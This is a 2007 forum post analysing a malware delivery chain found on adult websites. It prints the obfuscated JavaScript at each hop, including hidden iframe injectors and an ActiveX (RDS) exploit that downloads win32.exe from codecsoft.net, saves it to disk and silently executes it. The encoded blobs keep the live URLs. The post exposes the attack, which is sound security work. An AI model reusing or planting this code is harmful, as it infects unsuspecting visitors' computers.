Old 04-04-2007, 10:41 AM  
Quickdraw
So I went to triplexporn.org which links/trades to top-amateur.com and on top-amateur.com there is a popup to nichetgp.com. Nichetgp and top-amateur are owned by the same individual.
On nichetgp.com is this code
Code:
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%63%6f%64%65%63%73%6f%66%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%30%36%34%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
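which decodes to a document.write() call that injects a hidden 1x1 iframe (the URL is written with "http-//" so it is not clickable):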
iframe src=http-//codecsoft.net/strong/064/ width=1 height=1></iframe
 and
codecsoft.net/adv/new.php?adv=64 width=1 height=1  with more obfuscated code
Now codecsoft.net has this code
Code:
document.write(unescape("%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%73%74%79%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29%7d%20%3c%2f%73%74%79%6c%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e
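which translates to the markup below: a style rule that loads 123.htm as the cursor, and four hidden 1x1 iframes, exp1.htm through exp4.htm. The bytes after each "//" are not ASCII (they look like text in a Cyrillic code page), so they show up as garbage here; the leading document.write(unescape(\" is left over from the decoder: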
document.write(unescape(\"// ? ¬¥haâ ਩ ha å :) -->
<style> * {CURSOR: url("123.htm")} </style>
<iframe src="exp1.htm" width="1" height="1"></iframe>
// ? ¬¥haâ ਩ ha å :) -->
<iframe src="exp2.htm" width="1" height="1"></iframe>
// ? ¬¥haâ ਩ ha å :) -->
<iframe src="exp3.htm" width="1" height="1"></iframe>
// ? ¬¥haâ ਩ ha å :) -->
<iframe src="exp4.htm" width="1" height="1"></iframe>
exp1.htm contains this code
Code:
document.write(unescape("%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%20%0a%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%76%61%72%20%78%6e%61%6d%65%3d%27%6f%62%27%2b%27%6a%27%3b%0a%76%61%72%20%6f%62%6a%5f%52%44%53%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%78%6e%61%6d%65%2b%27%65%63%74%27%29%3b%0a%76%61%72%20%69%64%73%3d%27%69%27%2b%27%64%27%3b%0a%76%61%72%20%78%72%64%73%3d%27%52%27%2b%27%44%53%27%3b%0a%6f%62%6a%5f%52%44%53%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%69%64%73%2c%27%6f%62%6a%5f%27%2b%78%72%64%73%29%3b%0a%0a%76%61%72%20%63%6c%73%5f%69%64%31%3d%27%63%6c%27%2b%27%73%69%27%2b%27%64%3a%42%44%27%2b%27%39%36%43%35%27%3b%0a%76%61%72%20%63%6c%73%5f%69%64%32%3d%27%35%36%27%2b%27%2d%36%35%27%2b%27%41%33%2d%31%31%27%2b%27%44%30%2d%39%38%33%41%27%2b%27%2d%30%30%43%30%34%27%2b%27%46%43%32%39%45%33%36%27%3b%0a%6f%62%6a%5f%52%44%53%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%27%63%6c%61%73%73%69%64%27%2c%63%6c%73%5f%69%64%31%2b%63%6c%73%5f%69%64%32%29%3b%0a%0a%76%61%72%20%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%30%3b%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%76%61%72%20%78%6e%61%6d%65%5f%73%74%72%3d%22%61%64%22%2b%22%6f%64%62%2e%73%22%2b%22%74%72%65%61%6d%22%3b%0a%74%72%79%20%7b%20%76%61%72%20%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%6f%62%6a%5f%52%44%53%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%78%6e%61%6d%65%5f%73%74%72%2c%22%22%29%3b%20%0a%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%7d%20%69%66%20%28%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%21%3d%20%31%29%20%0a%7b%20%74%72%79%20%7b%20%76%61%72%20%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%78%6e%61%6d%65%5f%73%74%72%29%3b%20%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%7d%20%7d%20%0a%69%66%20%28%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%
62%20%3d%3d%20%31%29%20%7b%20%74%72%79%20%7b%20%0a%76%61%72%20%61%70%70%6c%5f%3d%22%53%68%22%2b%22%65%6c%22%2b%22%6c%2e%41%70%70%22%2b%22%6c%69%63%61%22%2b%22%74%69%6f%6e%22%3b%0a%76%61%72%20%6f%62%6a%5f%53%68%65%6c%6c%41%70%70%20%3d%20%6f%62%6a%5f%52%44%53%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%70%70%6c%5f%2c%22%22%29%3b%0a%76%61%72%20%78%6d%6c%5f%6e%61%6d%65%3d%22%6d%73%22%2b%22%78%6d%22%2b%22%6c%32%2e%58%22%2b%22%4d%4c%48%22%2b%22%54%54%50%22%3b%0a%76%61%72%20%6f%62%6a%5f%6d%73%78%6d%6c%32%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%78%6d%6c%5f%6e%61%6d%65%29%3b%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%6f%62%6a%5f%6d%73%78%6d%6c%32%2e%6f%70%65%6e%28%22%47%22%2b%22%45%54%22%2c%22%68%74%74%70%3a%2f%2f%63%6f%64%65%63%73%6f%66%74%2e%6e%65%74%2f%61%64%76%2f%30%36%34%2f%77%69%6e%33%32%2e%65%78%65%22%2c%66%61%6c%73%65%29%3b%20%0a%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%0a%6f%62%6a%5f%6d%73%78%6d%6c%32%2e%73%65%6e%64%28%29%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%74%79%70%65%20%3d%20%31%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%6f%70%65%6e%28%29%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%57%72%69%74%65%28%6f%62%6a%5f%6d%73%78%6d%6c%32%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%29%3b%20%0a%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%0a%76%61%72%20%66%6e%20%3d%20%22%43%3a%5c%5c%78%78%31%32%33%32%32%35%35%22%2b%22%2e%65%22%2b%22%78%65%22%3b%20%6f%62%6a%5f%61%64%6f%64%62%2e%53%61%76%65%54%6f%46%69%6c%65%28%66%6e%2c%32%29%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%63%6c%6f%73%65%28%29%3b%20%6f%62%6a%5f%53%68%65%6c%6c%41%70%70%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%66%6e%29%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%7d%20%7d%20%3c%2f%73%63%72%69%70%74%3e"));
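which translates to the script below. The decoder dropped the "+" operators (%2b in the encoded form), so adjacent quoted fragments such as 'ob' 'j' were originally joined into one string; the names are presumably split up like this to get past simple string matching. In short, the script creates an ActiveX object by class ID, uses it to obtain adodb.stream and Shell.Application objects, fetches codecsoft.net/adv/064/win32.exe through msxml2.XMLHTTP, saves it as C:\xx1232255.exe and runs it. Every step sits inside an empty catch block, so a failure gives the visitor no visible error: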
document.write(unescape(\"<script language="JavaScript"> 

// ? ¬¥haâ ਩ ha å :) -->
var xname='ob' 'j';
var obj_RDS = document.createElement(xname 'ect');
var ids='i' 'd';
var xrds='R' 'DS';
obj_RDS.setAttribute(ids,'obj_' xrds);

var cls_id1='cl' 'si' 'd:BD' '96C5';
var cls_id2='56' '-65' 'A3-11' 'D0-983A' '-00C04' 'FC29E36';
obj_RDS.setAttribute('classid',cls_id1 cls_id2);

var is__obj_adodb = 0;
// ? ¬¥haâ ਩ ha å :) -->
var xname_str="ad" "odb.s" "tream";
try { var obj_adodb = obj_RDS.CreateObject(xname_str,""); 
is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1) 
{ try { var obj_adodb = new ActiveXObject(xname_str); is__obj_adodb = 1; } catch(e){} } 
if (is__obj_adodb == 1) { try { 
var appl_="Sh" "el" "l.App" "lica" "tion";
var obj_ShellApp = obj_RDS.CreateObject(appl_,"");
var xml_name="ms" "xm" "l2.X" "MLH" "TTP";
var obj_msxml2 = new ActiveXObject(xml_name);
// ? ¬¥haâ ਩ ha å :) -->
obj_msxml2.open("G" "ET","http---codecsoft.net/adv/064/win32.exe",false); 

// ? ¬¥haâ ਩ ha å :) -->

obj_msxml2.send(); 
obj_adodb.type = 1; 
obj_adodb.open(); 
obj_adodb.Write(obj_msxml2.responseBody); 

// ? ¬¥haâ ਩ ha å :) -->

var fn = "C:\\xx1232255" ".e" "xe"; obj_adodb.SaveToFile(fn,2); 
obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>\"));